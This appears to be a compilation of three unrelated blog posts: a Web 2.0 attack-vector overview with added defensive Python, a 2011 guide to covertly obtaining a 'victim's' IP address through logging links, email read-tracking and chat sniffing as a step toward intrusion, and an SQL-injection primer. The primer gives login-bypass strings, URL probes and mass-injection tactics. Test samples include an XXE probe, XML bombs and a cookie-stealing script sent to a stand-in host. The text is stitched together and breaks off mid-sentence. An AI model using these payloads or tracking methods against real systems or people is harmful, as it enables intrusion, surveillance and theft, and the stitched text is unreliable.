Web 2.0 is the term coined for the new generation of Web applications; start.com, Google Maps, Writely and MySpace.com are a few examples. A shifting technological landscape is the driving force behind these applications. On one side, Web services are powering core server-side components; on the other, AJAX and Rich Internet Application (RIA) clients are enriching the user interface inside the browser itself. XML plays a significant part both in presentation and on the wire over HTTP/HTTPS: to some extent XML is supplementing HTML at the presentation layer, while SOAP (XML messages carried over HTTP) is becoming the messaging format of choice for Web services.
WEB 2.0 Security concerns – Reshaping the industry
This technological transformation brings new security concerns and attack vectors with it. Worms such as Yamanner, Samy and Spaceflash exploit "client-side" AJAX frameworks, opening new avenues of attack and exposing confidential information. On the "server-side", XML-based Web services are taking over key functions and exposing them for distributed access through Web services interfaces; the ability to invoke these methods over GET, POST or SOAP directly from the browser creates new openings into applications. RIA frameworks built on XML, XUL, Flash, applets and JavaScript add further possible vectors. RIA, AJAX and Web services each add new dimensions to Web application security.
Here is the list of 10 attack vectors along with a brief overview of each:
1. Cross-site scripting in AJAX
In the last few months several cross-site scripting attacks have been observed in which malicious JavaScript from one Web site runs in the victim's browser in the context of another and compromises information. A recent example is the Yamanner worm, which exploited cross-site scripting opportunities in Yahoo Mail's AJAX code; another is the Samy worm, which exploited a cross-site scripting flaw on MySpace.com. An AJAX application is itself script running on the client: it takes data from XMLHttpRequest responses and writes it into the page, and if it does so without encoding (for example via innerHTML, or eval on a server response), an attacker who controls that data, whether through a crafted link or through a stored profile field or mail, gets JavaScript executed in every visitor's browser. The attacker only needs to coax unsuspecting users into visiting the page, and because the injected script can itself issue XMLHttpRequest calls in the victim's session, it can act and propagate silently, as the worms above did. The vulnerability existed in traditional applications as well, but AJAX has added a new dimension to it.
2. XML poisoning
XML traffic goes back and forth between server and browser in many Web 2.0 applications, and Web applications consume XML blocks coming from AJAX clients. It is possible to poison such a block. A common technique is to send recursive or repeated payloads: the same node nested or repeated thousands of times, or entity declarations that expand into each other. If the parser's handling is poor this results in a denial of service on the server through CPU or memory exhaustion. Attackers also send malformed XML to disrupt logic that depends on how the server parses it. Two kinds of parser are in use on the server side, SAX (event-driven) and DOM (which builds the whole tree in memory); DOM parsers are the more exposed to memory exhaustion. The same attack vector applies to Web services, since they consume SOAP messages and SOAP messages are nothing but XML. Large-scale adoption of XML at the application layer opens up new opportunities for this vector. XML external entity (XXE) references are an XML feature an attacker can manipulate: if the parser resolves them, the document can pull in local files or open TCP connections from the server, and the attacker can leverage either. XML schema poisoning is another variant that can change execution flow. Any of these can help an attacker compromise confidential information.
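One server-side guard against these payloads, as an added example that is not from the original article: it refuses any document carrying a DOCTYPE (which removes both external entities and entity-expansion bombs, since both need a DTD), caps document size and nesting depth, and does so with Expat callbacks before any tree is built. The sample documents are constructed for the example and the limits are assumptions to tune per application. Recent Expat releases also carry their own amplification limits, but refusing DTDs outright is the simpler rule to reason about.

```python
import xml.parsers.expat

MAX_BYTES = 64 * 1024   # assumed limits: tune per application
MAX_DEPTH = 32


class UnsafeXML(Exception):
    """Raised with a short reason code when a document is rejected."""
    def __init__(self, reason, detail=""):
        super().__init__(f"{reason}: {detail}" if detail else reason)
        self.reason = reason


def check_xml(data: bytes, max_bytes=MAX_BYTES, max_depth=MAX_DEPTH) -> int:
    """Parse with Expat callbacks only (no tree is built) and raise UnsafeXML
    on a DTD, excessive size or excessive nesting. Returns the deepest element
    level seen, so a caller can log how close inputs come to the cap."""
    if len(data) > max_bytes:
        raise UnsafeXML("size", f"{len(data)} bytes > {max_bytes}")

    parser = xml.parsers.expat.ParserCreate()
    depth = 0
    deepest = 0

    def reject_doctype(name, sysid, pubid, has_internal_subset):
        # No DTD means no <!ENTITY ...>: kills XXE and billion-laughs at once.
        raise UnsafeXML("doctype", f"DOCTYPE {name!r} not allowed")

    def reject_entity(*_args):
        # Unreachable once DOCTYPE is refused; kept as defence in depth.
        raise UnsafeXML("doctype", "entity declaration not allowed")

    def start_element(name, attrs):
        nonlocal depth, deepest
        depth += 1
        deepest = max(deepest, depth)
        if depth > max_depth:
            raise UnsafeXML("depth", f"nesting deeper than {max_depth} at <{name}>")

    def end_element(name):
        nonlocal depth
        depth -= 1

    parser.StartDoctypeDeclHandler = reject_doctype
    parser.EntityDeclHandler = reject_entity
    parser.StartElementHandler = start_element
    parser.EndElementHandler = end_element
    parser.Parse(data, True)   # exceptions raised in the handlers propagate from here
    return deepest


def classify(data: bytes) -> str:
    """'ok', or the reason the guard refused the document."""
    try:
        check_xml(data)
        return "ok"
    except UnsafeXML as exc:
        return exc.reason
    except xml.parsers.expat.ExpatError:
        return "malformed"


# Constructed samples: an XXE probe, an entity-expansion bomb, a nesting bomb,
# a truncated document and a benign SOAP request.
XXE = (b'<?xml version="1.0"?>\n'
       b'<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>\n'
       b'<foo>&xxe;</foo>')
LAUGHS = (b'<?xml version="1.0"?>\n<!DOCTYPE lolz [<!ENTITY lol "lol">\n'
          b'<!ENTITY lol2 "' + b'&lol;' * 10 + b'">\n'
          b'<!ENTITY lol3 "' + b'&lol2;' * 10 + b'">]>\n'
          b'<lolz>&lol3;</lolz>')
NESTED = b'<a>' * 200 + b'</a>' * 200
TRUNCATED = b'<soap:Envelope><soap:Body><getUser><id>10'
SOAP = (b'<?xml version="1.0"?>'
        b'<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">'
        b'<soap:Body><getUser><id>10</id></getUser></soap:Body></soap:Envelope>')

if __name__ == "__main__":
    for label, doc in [("xxe", XXE), ("laughs", LAUGHS), ("nested", NESTED),
                       ("truncated", TRUNCATED), ("soap", SOAP)]:
        print(f"{label:10s} -> {classify(doc)}")
```

Run the guard on the raw bytes before handing them to whichever SAX or DOM parser the application uses; a DOM parser that never sees the bomb cannot be exhausted by it.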
3. Malicious AJAX code execution
AJAX calls are silent: end users cannot tell whether the browser is making background calls with the XMLHttpRequest object. Whenever the browser makes a request to a Web site it attaches that site's cookies, no matter which page issued the request. This creates opportunities for compromise. For example, John logs in to his bank and authenticates on the server; after authentication he holds a session cookie, and his bank's pages contain a lot of critical information. While still logged in he browses elsewhere and lands on an attacker's page. On this page the attacker has placed silent AJAX code that makes requests to the bank without John's consent, and those requests carry John's session cookie. The browser's same-origin policy stops the attacker's script from reading the bank's responses through XMLHttpRequest, so the direct result is cross-site request forgery: the forged requests can perform actions in John's name, such as a transfer or a change of contact details. Confidential data leaks as well wherever the bank serves it in a form another origin can read, for instance JSON returned as a bare array or as JavaScript that the attacker's page can load with a script tag. Either way this is a security breach, and the defence is to require evidence that a request came from the application's own pages (a CSRF token, plus a check of the Origin or Referer header) rather than trusting the session cookie alone.
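The server-side check that stops the forged request in John's scenario, as an added example that is not from the original article: a token derived from the session with a server secret, required on every state-changing request, together with an Origin/Referer check. The bank's origin, the secret and the two sample requests are constructed assumptions for the example.

```python
import hashlib
import hmac
import secrets
from urllib.parse import urlsplit

# Assumptions for the example: the bank's own origin, and a per-deployment
# secret (generated at start-up here; in production it is stored, not regenerated).
SITE_ORIGIN = "https://bank.example"
SERVER_SECRET = secrets.token_bytes(32)


def csrf_token(session_id: str, secret: bytes = SERVER_SECRET) -> str:
    """A token bound to the session. The attacker's page can make the browser
    send John's cookie, but it cannot read his pages to learn this value and
    cannot compute it without the server secret."""
    return hmac.new(secret, session_id.encode(), hashlib.sha256).hexdigest()


def request_origin(headers: dict):
    """Origin as sent by the browser, falling back to the Referer's origin."""
    origin = headers.get("Origin")
    if origin:
        return origin
    referer = headers.get("Referer")
    if referer:
        parts = urlsplit(referer)
        return f"{parts.scheme}://{parts.netloc}"
    return None


def authorize_state_change(session_id: str, headers: dict, form: dict,
                           secret: bytes = SERVER_SECRET):
    """Gate for any request that changes state (transfer, address change...).
    The session cookie alone proves nothing about which page sent the request."""
    origin = request_origin(headers)
    if origin != SITE_ORIGIN:
        # Cross-site XHR and form posts carry a foreign Origin; a request with
        # neither header is treated as cross-site rather than given the benefit
        # of the doubt.
        return False, f"origin not allowed: {origin}"
    supplied = form.get("csrf_token", "")
    if not hmac.compare_digest(supplied, csrf_token(session_id, secret)):
        return False, "missing or invalid CSRF token"
    return True, "ok"


# Constructed requests: John's own page versus the attacker's silent AJAX call.
# Both arrive with the same session cookie; only the first can pass.
SESSION_ID = "sess-4f3c9a"
LEGIT = ({"Origin": "https://bank.example"},
         {"to": "ACME-0042", "amount": "250", "csrf_token": csrf_token(SESSION_ID)})
FORGED = ({"Origin": "https://attacker.invalid"},
          {"to": "MULE-0001", "amount": "9000"})

if __name__ == "__main__":
    print("legit :", authorize_state_change(SESSION_ID, *LEGIT))
    print("forged:", authorize_state_change(SESSION_ID, *FORGED))
```

The token is compared with a constant-time function so that the check itself does not leak it, and it is tied to the session id rather than stored per page, so it survives the many small AJAX requests a Web 2.0 page makes.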
4. RSS / Atom injection
This is a new Web 2.0 attack. RSS feeds are a common means of sharing information on portals and Web applications: the feeds are fetched and consumed by the Web application and their content is sent on to the browser. If an attacker can get script, event-handler attributes or javascript: links into the content of a feed item, that script reaches the client browser. An end user visits the site, the page loads the feed, and the malicious script, which can install software or steal cookies, gets executed. This is a lethal client-side attack, and the payload is easily varied to evade naive filters. With RSS and Atom feeds becoming an integral part of Web applications, it is important to sanitise feed content on the server side before pushing it out to the end user: encode it as text, or allow only a small safe subset of HTML, rather than filtering out a few characters.
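The server-side sanitiser that vectors 1 and 4 both call for, as an added example not taken from the original article: feed item bodies are rebuilt from an allow-list of tags and attributes (so every on* handler, style and javascript: link is dropped) and titles are encoded as plain text, which is the same output-encoding discipline an AJAX page needs before it writes server data into the DOM. The feed, its tag allow-list and the attacker's payloads are constructed for the example; the sanitiser itself only needs the standard library.

```python
import xml.etree.ElementTree as ET
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Allow-list (an assumption for the example): what feed item bodies legitimately need.
ALLOWED_TAGS = {"p", "br", "b", "i", "em", "strong", "a", "ul", "ol", "li",
                "code", "pre", "blockquote"}
ALLOWED_ATTRS = {"a": {"href", "title"}}
SAFE_URL_SCHEMES = {"http", "https", "mailto", ""}   # "" = relative URL
VOID_TAGS = {"br"}


class FeedSanitizer(HTMLParser):
    """Rebuilds HTML keeping only allow-listed tags and attributes; text inside
    <script>/<style> is dropped entirely, all other text is re-encoded."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.skip_depth = 0

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self.skip_depth += 1
            return
        if self.skip_depth or tag not in ALLOWED_TAGS:
            return                      # drop the tag, keep its text
        safe_attrs = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue                # drops onclick, onmouseover, style, ...
            if name == "href":
                scheme = urlsplit((value or "").strip()).scheme.lower()
                if scheme not in SAFE_URL_SCHEMES:
                    continue            # drops javascript:, data:, vbscript:
            safe_attrs.append(f' {name}="{escape(value or "", quote=True)}"')
        self.out.append(f"<{tag}{''.join(safe_attrs)}>")

    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            self.skip_depth = max(0, self.skip_depth - 1)
            return
        if not self.skip_depth and tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skip_depth:
            self.out.append(escape(data, quote=False))


def sanitize(fragment: str) -> str:
    parser = FeedSanitizer()
    parser.feed(fragment)
    parser.close()
    return "".join(parser.out)


def sanitize_feed(rss: bytes):
    """(title, body) pairs ready to push to the browser. The raw feed should
    already have passed a size/DTD guard before it reaches fromstring()."""
    root = ET.fromstring(rss)
    items = []
    for item in root.iter("item"):
        title = escape(item.findtext("title", default=""), quote=False)
        body = sanitize(item.findtext("description", default=""))
        items.append((title, body))
    return items


# Constructed feed: one benign item, one carrying three injection attempts.
SAMPLE_RSS = b"""<?xml version="1.0"?>
<rss version="2.0"><channel><title>Example feed</title>
<item><title>Benign post</title><description>&lt;p&gt;Hello &lt;b&gt;world&lt;/b&gt; &lt;a href="https://example.org/"&gt;link&lt;/a&gt;&lt;/p&gt;</description></item>
<item><title>&lt;script&gt;alert(1)&lt;/script&gt;Evil</title><description>&lt;p onmouseover="alert(document.cookie)"&gt;click &lt;a href="javascript:alert(1)"&gt;me&lt;/a&gt;&lt;/p&gt;&lt;script&gt;document.location='http://attacker.invalid/?c='+document.cookie&lt;/script&gt;</description></item>
</channel></rss>"""

if __name__ == "__main__":
    for title, body in sanitize_feed(SAMPLE_RSS):
        print(title, "=>", body)
```

An allow-list rebuild is preferred to a deny-list of characters because the parser, not a regular expression, decides what is a tag; the page then receives markup it would have produced itself.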
5. WSDL scanning and enumeration
WSDL (Web Services Description Language) describes the interface of a Web service. The WSDL file provides key information about the technologies in use, the exposed methods, their parameters and invocation patterns, and so on. This is sensitive information and helps an attacker define exploitation methods. Unnecessary functions or methods left exposed can spell disaster for a Web service, so it is important to protect the WSDL file or restrict access to it, and to remove test and administrative operations from the production interface. In real-world assessments, scanning the WSDL for such methods regularly turns up vulnerabilities.
6. Client side validation in AJAX routines
Web 2.0 applications use AJAX routines to do a lot of work on the client side, such as validating data types, content, date fields and so on. These client-side checks must always be backed by the same checks on the server. Many developers fail to do so, reasoning that validation is already taken care of in the AJAX routines. But anything that runs in the browser is under the user's control: the AJAX-based validation can be bypassed by sending POST or GET requests directly to the application, a major source of input-validation attacks such as SQL injection, LDAP injection and so on that can compromise a Web application's key resources. This expands the list of attack vectors that attackers can add to their existing arsenal. AJAX routines are
7. Web services routing issues
Web services protocols include WS-Routing (a specification later superseded by WS-Addressing). WS-Routing allows a SOAP message to travel in a specified sequence through several nodes on the Internet, and encrypted messages often traverse these nodes. If confidentiality relies only on transport-level encryption (SSL/TLS) between hops, each intermediate node handles the message in the clear, so a compromise of any intermediate node gives access to the SOAP messages travelling between the two end points. Message-level protection (WS-Security encryption and signing of the body) is what keeps intermediaries from reading or altering it. As Web applications adopt the Web services framework, the focus shifts to these new protocols and new attack vectors emerge.
8. Parameter manipulation with SOAP
Web services consume information and variables from SOAP messages, and it is possible to manipulate these variables. For example, "<id>10</id>" is one node in a SOAP message. An attacker can manipulate this node and try different injections (SQL, LDAP, XPath, command shell) to explore possible attack vectors and get a hold on internal machines. Incorrect or insufficient input validation in Web services code leaves the application open to compromise; the SOAP envelope is just another untrusted input channel and must be validated like any form field. This is a newly available attack vector for Web applications that expose Web services.
9. XPATH injection in SOAP message
XPath is a language for querying XML documents; much as an SQL statement takes parameters and fetches rows from a database, an XPath expression takes values and selects nodes from a document. XPath is supported in many languages. Web applications consume large XML documents, and many take input from the end user and build XPath expressions from it by string concatenation. That code is vulnerable to XPath injection. If an XPath injection succeeds, the attacker can bypass authentication or extract confidential information. XPath 1.0 has no equivalent of parameterised queries and no escape sequence for quotes inside string literals, which is why concatenation is so fragile. The way to block this vector is to validate input strictly before it reaches an XPath statement and, where the engine supports it, bind user values as XPath variables instead of splicing them into the expression.
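An added example, not from the original article, covering vectors 8 and 9 together: the parameters are pulled out of a SOAP body, and the login expression is built twice, once by the concatenation the text warns about and once with a literal-quoting routine that copes with XPath 1.0's lack of escapes (a value containing both quote kinds is assembled with concat()). The envelope, operation and element names are constructed assumptions. Python's bundled ElementTree cannot evaluate these predicates, so the block shows the expression text that each approach would hand to an XPath engine; with lxml one would go further and bind the values as variables with xpath(expr, name=value).

```python
import re
import xml.etree.ElementTree as ET

SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"


def soap_params(envelope: bytes, operation: str) -> dict:
    """Child elements of <operation> in the SOAP Body, as a tag -> text dict.
    (Parse only after the envelope has passed size/DTD checks.)"""
    root = ET.fromstring(envelope)
    body = root.find(f"{{{SOAP_NS}}}Body")
    if body is None:
        raise ValueError("no SOAP Body")
    op = body.find(operation)
    if op is None:
        raise ValueError(f"no <{operation}> in Body")
    return {child.tag: (child.text or "") for child in op}


def xpath_literal(value: str) -> str:
    """Emit an XPath 1.0 string literal for arbitrary text. There is no escape
    sequence inside a literal, so text holding both ' and " is stitched
    together with concat()."""
    if "'" not in value:
        return f"'{value}'"
    if '"' not in value:
        return f'"{value}"'
    parts = value.split("'")
    return "concat(" + ", \"'\", ".join(f"'{p}'" for p in parts) + ")"


def login_xpath_unsafe(user: str, pw: str) -> str:
    # What concatenation produces: a quote in the input ends the literal.
    return f"//user[name/text()='{user}' and password/text()='{pw}']"


def login_xpath_safe(user: str, pw: str) -> str:
    # The same query with every value emitted as a well-formed literal.
    return (f"//user[name/text()={xpath_literal(user)}"
            f" and password/text()={xpath_literal(pw)}]")


USERNAME_RE = re.compile(r"[A-Za-z0-9_.-]{1,32}")


def validate_username(user: str) -> bool:
    """Allow-list validation: the cheap first line of defence."""
    return USERNAME_RE.fullmatch(user) is not None


# Constructed envelope carrying the classic ' or '1'='1 payload in both fields.
ENVELOPE = f"""<?xml version="1.0"?>
<soap:Envelope xmlns:soap="{SOAP_NS}">
  <soap:Body>
    <login>
      <username>' or '1'='1</username>
      <password>' or '1'='1</password>
    </login>
  </soap:Body>
</soap:Envelope>""".encode()

if __name__ == "__main__":
    p = soap_params(ENVELOPE, "login")
    print("valid username?", validate_username(p["username"]))
    print("unsafe:", login_xpath_unsafe(p["username"], p["password"]))
    print("safe:  ", login_xpath_safe(p["username"], p["password"]))
```

In the unsafe form the payload turns the predicate into `name='' or '1'='1' and ...`, which is true for every user node; in the safe form the whole payload stays inside one double-quoted literal and simply fails to match.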
10. RIA thick client binary manipulation
Rich Internet Applications (RIA) use rich UI components such as Flash, ActiveX controls or applets as their primary interface to the Web application. There are a few security issues with this approach. One major issue is session management: the component runs inside the browser and shares its session, so it inherits the same cookies and ambient authority as the page. At the same time, since the entire binary component is downloaded to the client, an attacker can reverse engineer the binary and decompile the code, and it is possible to patch these binaries and bypass any authentication or validation logic contained in them. Logic that must hold cannot live only in the client binary. This is another interesting attack vector for Web 2.0 frameworks.
Conclusion
AJAX, RIA and Web services are three important technological vectors for the Web 2.0 application space. These technologies are promising and change the picture, improving the overall effectiveness and efficiency of Web applications. With the new technologies come new security issues, and ignoring them can lead to big disasters for the corporate world. In this article the discussion was restricted to ten attacks, but there are several other attack vectors as well. Increased Web 2.0 security awareness, secure coding practices and secure deployments offer the best defence against these new attack vectors.
Friday, July 1, 2011
How to get IP address of another computer remotely
Hello friends, today I will explain how to get the IP address of any computer remotely. Using some very basic tricks we can find the IP address of a remote computer, and from there you can start further work against the remote system, such as port scanning and looking for vulnerabilities to get into it.
There are several methods to get the IP address of a target, but I will share a few, and especially the best ones, which tell you the IP address in just a few clicks. All of them are free, and all are manual methods, meaning you do not need any tool.
How to find or get the IP address of somebody else remotely
4 ways to get the IP address of the Victim or another Computer:
1. Using PHP notification Script
2. Using Blogs and Websites
3. Using Read Notify service
4. Sniffing during Gmail and yahoo chat sessions
As we are here to learn concepts, I will first explain what an IP address is and why it matters. So, a very basic question: what is an IP address, and why is it important for hackers and security professionals?
What is an IP address?
Basically, an IP address (Internet Protocol address) is a numerical label, unique within its network, assigned to each computer, printer or other device on a network that uses the Internet Protocol to communicate. A protocol is a set of rules; for a network, it is the rules for communication.
IP address serves for two basic purposes:
1. Host or network interface identification
2. Location Addressing
For more on IP addressing, read the Wikipedia article.
How to Find IP address of another computer?
1. Using PHP notification Script
Using this notification script you can get the IP address in seconds. Steps for using the PHP script:
a. Download the PHP notify script and extract the files.
b. You will get two files, ip.html and index.php. Upload both to any free web hosting server.
Example: I used www.my3gb.com to upload these two files. Create an account there and upload the two files.
c. Now send the link to index.php to the victim whose IP address you want. To get the link, click on index.php in the host's file manager; a new window will open. Copy the link from the address bar and send it to the victim.
d. When the victim opens the link nothing visible happens, but his IP address is written into ip.html. Open ip.html to read it.
e. That's all for this method. I hope you liked it.
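The same notification idea written as a small stand-alone server, as an added example that is not the PHP script the post links to: it answers the link with an empty page and appends the visitor's address, path and User-Agent to a log. The log path and the trusted-proxy range are assumptions. The point a practitioner needs here is the caveat in client_ip(): on shared or free hosting the request usually arrives through the provider's reverse proxy, so the peer address is the proxy's and the visitor is in X-Forwarded-For; but that header can be forged by anyone, so it is believed only when the peer really is a proxy you trust.

```python
import ipaddress
from datetime import datetime, timezone
from http.server import BaseHTTPRequestHandler, HTTPServer
from typing import Optional

LOG_PATH = "ip.log"                                     # assumed; stands in for ip.html
TRUSTED_PROXIES = [ipaddress.ip_network("10.0.0.0/8")]  # assumed: the host's own reverse proxies


def client_ip(remote_addr: str, forwarded_for: Optional[str],
              trusted=TRUSTED_PROXIES) -> str:
    """Address to record. remote_addr is the TCP peer; X-Forwarded-For is
    honoured only when that peer is a trusted proxy, and then the right-most
    hop that is not itself a trusted proxy is taken as the client."""
    peer = ipaddress.ip_address(remote_addr)
    if forwarded_for and any(peer in net for net in trusted):
        hops = [h.strip() for h in forwarded_for.split(",") if h.strip()]
        for hop in reversed(hops):
            try:
                addr = ipaddress.ip_address(hop)
            except ValueError:
                break                          # garbage in the header: fall back
            if not any(addr in net for net in trusted):
                return str(addr)
    return remote_addr


def log_line(remote_addr: str, headers, path: str) -> str:
    """One record per hit: UTC time, chosen address, requested path, browser."""
    ts = datetime.now(timezone.utc).isoformat(timespec="seconds")
    ip = client_ip(remote_addr, headers.get("X-Forwarded-For"))
    agent = headers.get("User-Agent", "-")
    return f"{ts} {ip} {path} {agent!r}"


class NotifyHandler(BaseHTTPRequestHandler):
    """Records the visitor and answers with an empty 204, so nothing is shown."""

    def do_GET(self):
        with open(LOG_PATH, "a", encoding="utf-8") as log:
            log.write(log_line(self.client_address[0], self.headers, self.path) + "\n")
        self.send_response(204)
        self.end_headers()

    def log_message(self, *_args):
        pass                                   # keep stdout quiet


if __name__ == "__main__":
    HTTPServer(("0.0.0.0", 8080), NotifyHandler).serve_forever()
```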
2. Using Blogs and Websites
This method is for those who have their own blog or website, but normal users can do it too, as a blog is free to make. Make a new blog and add a stats service such as Histats or any other stats widget: add a new widget, paste the Histats code there and save the template. Then send the link to your blog to your friend and read his IP from the stats.
That's all.
3. Using Read Notify service
This is an email-based service. Steps to use Read Notify:
a. First open the Read Notify website.
b. Register on the website; it will send you a confirmation mail. Verify your account.
c. Once your account is activated, do the following to use the service:
- Compose your email just as you usually would in your own email program or webmail
- Type .readnotify.com on the end of your recipient's email address (don't worry, that gets removed before your recipient receives the email), like this: ABC@gmail.com.readnotify.com
- Send your email
- Don't send to and from the same computer
- If your email program auto-completes email addresses from your address book, you'll need to keep typing over the top of the auto-completed one to add the .readnotify.com
- If you are cc-ing your email to other readers, you must add tracking to all of them
4. Sniffing Yahoo and Gmail Chat sessions
With the help of sniffers such as Ethereal or Wireshark we can capture the Gmail or Yahoo chat session while chatting with a friend and extract IP addresses from the capture. Bear in mind that ordinary text chat is relayed through Google's or Yahoo's servers, so the address you see there is the server's; the peer's own address may show up only for traffic that goes directly to the peer, such as a voice or video call or a direct file transfer.
5. Bonus Method for Online Gamers
We can also get IP addresses from online games such as Counter-Strike or Age of Empires on GameRanger. Many Counter-Strike servers run AMX Mod; just watch who is connecting and what their IP address is, since the plugin shows the IP address of players joining the game server. If you have more access to the Counter-Strike server you can use the status command in the console: open the console, type "status" (without quotes) and press Enter, and you will see every player's details, including their Steam ID and, depending on the server, more.
Saturday, May 28, 2011
How They Hack Your Website: Overview of Common Techniques
We hear the same terms bandied about whenever a popular site gets hacked. You know… SQL Injection, cross site scripting, that kind of thing. But what do these things mean? Is hacking really as inaccessible as many of us imagine — a nefarious, impossibly technical twilight world forever beyond our ken?
Not really.
When you consider that you can go to Google right now and enter a search string which will return you thousands of usernames and passwords to websites, you realize that this dark science is really no mystery at all. You'll react similarly when you see just how simple a concept SQL Injection is, and how it can be automated with simple tools. Read on, to learn the basics of how sites and web content management systems are most often hacked, and what you can do to reduce the risk of it happening to you.
SQL Injection
SQL Injection involves entering SQL code into web forms, eg. login fields, or into the browser address field, to access and manipulate the database behind the site, system or application.
When you enter text in the Username and Password fields of a login screen, the data you input is typically inserted into an SQL command, and where the application builds that command by concatenating your text into it, your text becomes part of the SQL. The command checks the data you've entered against the relevant table in the database. If your input matches table/row data, you're granted access (in the case of a login screen). If not, you're knocked back out.
The Simple SQL Injection Hack
In its simplest form, this is how SQL Injection works. It's impossible to explain this without reverting to code for just a moment. Don't worry, it will all be over soon.
Suppose we enter the following string in a Username field:
' OR 1=1 --
The authorization SQL query that is run by the server, the command which must be satisfied to allow access, will be something along the lines of:
SELECT * FROM users WHERE username = 'USRTEXT' AND password = 'PASSTEXT'
…where USRTEXT and PASSTEXT are what the user enters in the login fields of the web form.
So entering ' OR 1=1 -- as your username could result in the following actually being run:
SELECT * FROM users WHERE username = '' OR 1=1 -- ' AND password = 'whatever'
Two things you need to know about this:
['] closes the [username] string literal, so everything after it is parsed as SQL rather than as data.
[--] is the SQL convention for a comment, and everything after it to the end of the line is ignored. So the routine that actually runs is now:
SELECT * FROM users WHERE username = '' OR 1=1
1 is always equal to 1, last time I checked. So the authorization condition holds for every row in the table, and we are ushered in the front door to wreak havoc.
Let's hope you got the gist of that, and move briskly on.
Brilliant! I'm gonna go hack me a Bank!
Slow down, cowboy. This half-cooked method won't beat the systems they have in place up at Citibank, evidently.
But the process does serve to illustrate just what SQL Injection is all about: injecting code to manipulate a routine via a form, or indeed via the URL. In terms of login bypass via injection, the hoary old ' OR 1=1 is just one option. If a hacker thinks a site is vulnerable, there are cheat-sheets all over the web listing login strings which can gain access to weak systems. Here are a couple more common strings used to dupe SQL validation routines:
username field examples:
- admin'--
- ') or ('a'='a
- ") or ("a"="a
- hi" or "a"="a
… and so on. Which one works depends on how the query quotes and parenthesises the input: a string that closes a parenthesis the query never opened just produces a syntax error.
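The login bypass above, and the address-bar probe described later in this post, run against a throwaway SQLite database, as an added example that is not part of the original article: each lookup is written once the vulnerable way (input pasted into the SQL text) and once with a bound parameter, so the same payloads can be seen to succeed against one and fail against the other. The tables, accounts and article rows are constructed for the example, and the passwords are stored in clear only to keep it short.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample schema: a users table for the login and an articles
    table for the index.asp?id=10 style lookup."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    db.executemany("INSERT INTO users (username, password) VALUES (?, ?)",
                   [("admin", "s3cret"), ("alice", "hunter2")])
    db.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT)")
    db.executemany("INSERT INTO articles VALUES (?, ?)", [(10, "Tenth"), (11, "Eleventh")])
    return db


def login_vulnerable(db, username: str, password: str):
    """The pattern from the article: input is pasted into the SQL text, so a
    quote in the input ends the literal and the rest is parsed as SQL."""
    sql = ("SELECT username FROM users WHERE username = '" + username +
           "' AND password = '" + password + "'")
    row = db.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(db, username: str, password: str):
    """Parameterised: the driver passes the values separately from the SQL, so
    ' OR 1=1 -- is just a username that nobody has."""
    row = db.execute("SELECT username FROM users WHERE username = ? AND password = ?",
                     (username, password)).fetchone()
    return row[0] if row else None


def article_vulnerable(db, id_param: str):
    """index.asp?id=<id_param> with the value concatenated into the WHERE clause."""
    row = db.execute("SELECT title FROM articles WHERE id = " + id_param).fetchone()
    return row[0] if row else None


def article_safe(db, id_param: str):
    """Type-check first, then bind: anything but an integer is rejected outright."""
    try:
        article_id = int(id_param)
    except ValueError:
        return None
    row = db.execute("SELECT title FROM articles WHERE id = ?", (article_id,)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    for user in ["' OR 1=1 --", "admin'--"]:
        print(f"{user!r:16} vulnerable -> {login_vulnerable(db, user, 'x')!r}, "
              f"safe -> {login_safe(db, user, 'x')!r}")
    for probe in ["10", "10 AND 1=1", "10 AND 1=2", "10 AND id=11"]:
        print(f"id={probe!r:14} vulnerable -> {article_vulnerable(db, probe)!r}, "
              f"safe -> {article_safe(db, probe)!r}")
```

Note that the vulnerable login returns the first row in the table, which is why attackers like to land on an administrator account created before everyone else, and that the AND 1=1 versus AND 1=2 pair is the probe to use on a numeric parameter: a different answer for the two URLs is the signal, not the appearance of a second article.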
Backdoor Injection- Modules, Forums, Search etc.
Hacking web forms is by no means limited to login screens. A humble search form, for instance, is usually backed by a database query, and can potentially be used to read and amend database contents. Using SQL in search forms can do some extremely powerful things, such as pulling out usernames and passwords, enumerating tables and column names, and changing them. Do people really get hacked through their search forms? You'd better believe it. And through forums, and anywhere else a user can enter text into a field that ends up in a query. If security is weak enough, the hacker can probe the database for table and column names, then use constructs like UNION SELECT or stacked INSERT and UPDATE statements to pull out user information, change product prices, change account settings or balances, and just about anything else, depending on the security measures in place, the database architecture and so on.
So you can have security locked down at the login, but weak handling on other forms can still be exploited. Unfortunately this is a real worry with 3rd-party modules for Web CMS products which incorporate forms; for CMS products these 3rd-party modules are often the weakest link that lets hackers into your database.
Automated Injection
There are tools to automate SQL Injection into login and other fields. One hacker process, using such a tool, is to seek out a number of weak targets using Google (searching for login.asp, for instance), feed in a range of possible injection strings (like those listed above, culled from the innumerable injection cheat-sheets on the Web), add a list of proxies to cover his movements, and go play Xbox while the program automates the whole injection process.
Remote Injection
This involves uploading malicious files to inject SQL and exploit other vulnerabilities. It's a topic which was deemed beyond the scope of this report, but you can view the linked PDF if you'd like to learn more.
SQL Injection in the Browser Address Bar
Injections can also be performed via the browser address bar. I don't mean to have a pop at Microsoft, but when it comes to such vulnerabilities, HTTP GET requests with URLs of the following form are most often held to be vulnerable:
http://somesite.com/index.asp?id=10
Try adding an SQL command to the end of a URL string like this, just for kicks:
http://somesite.com/index.asp?id=10 AND id=11
See if both articles come up. Don't shoot your webmaster just yet if it's your own site and you get two articles popping up: this is real low-level access to the database. But some such sites will be vulnerable. Try adding some other simple SQL commands to the end of URLs from your own site, to see what happens.
